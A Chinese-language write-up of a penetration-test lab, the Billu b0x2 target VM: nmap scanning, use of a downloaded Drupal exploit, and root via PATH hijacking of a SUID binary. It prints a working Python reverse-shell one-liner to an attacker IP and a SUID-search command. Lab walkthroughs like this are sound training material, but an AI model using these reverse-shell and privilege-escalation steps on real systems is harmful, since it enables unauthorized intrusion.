渗透Billu b0x2靶机

渗透Billu b0x2靶机

1.nmap扫描与漏洞寻找

使用nmap扫描,扫描结果如下:

渗透Billu b0x2靶机_第1张图片渗透Billu b0x2靶机_第2张图片

发现开放了22、80、111、8080端口,先访问web服务,发现Drupal,寻找其漏洞。

渗透Billu b0x2靶机_第3张图片渗透Billu b0x2靶机_第4张图片

找到后,下载exp,直接按照说明使用,成功连接服务器。

渗透Billu b0x2靶机_第5张图片

为了方便后续的操作,使用python脚本反弹shell,在kali使用nc命令监听4444端口,python脚本如下,其中192.168.223.184是kali的ip:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.223.184",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

渗透Billu b0x2靶机_第6张图片渗透Billu b0x2靶机_第7张图片

2.提权

可以看到这是Ubuntu系统,内核是4.4.0,下载linux.sh进行漏洞审计,利用“脏牛”提权失败,利用其他内核漏洞提权同样失败。

渗透Billu b0x2靶机_第8张图片

渗透Billu b0x2靶机_第9张图片

渗透Billu b0x2靶机_第10张图片

用其他方法提权。

linux中除了r w x 三个权限外(分别代表r 读,w写,x执行),还有两个特殊的权限s 和t,当s权限在文件所有者x权限上时,例如:-rwsr-xr-x,此时称为Set UID,简称为SUID的特殊权限,即当执行该文件时将具有该文件所有者的权限。

在根目录寻找此类型文件:

find / -perm -u=s -type f 2>/dev/null

渗透Billu b0x2靶机_第11张图片

/opt/s就符合条件,使用strings打印,注意到scp命令,就选择它了。

渗透Billu b0x2靶机_第12张图片

在/tmp目录下建立scp文件,赋予可执行权限,把它添加到环境变量,这样执行/opt/s时,当他运行到scp时,就会执行我们在/tmp目录下建立的这个scp。

渗透Billu b0x2靶机_第13张图片

成功获得root权限。

 

你可能感兴趣的:(渗透测试)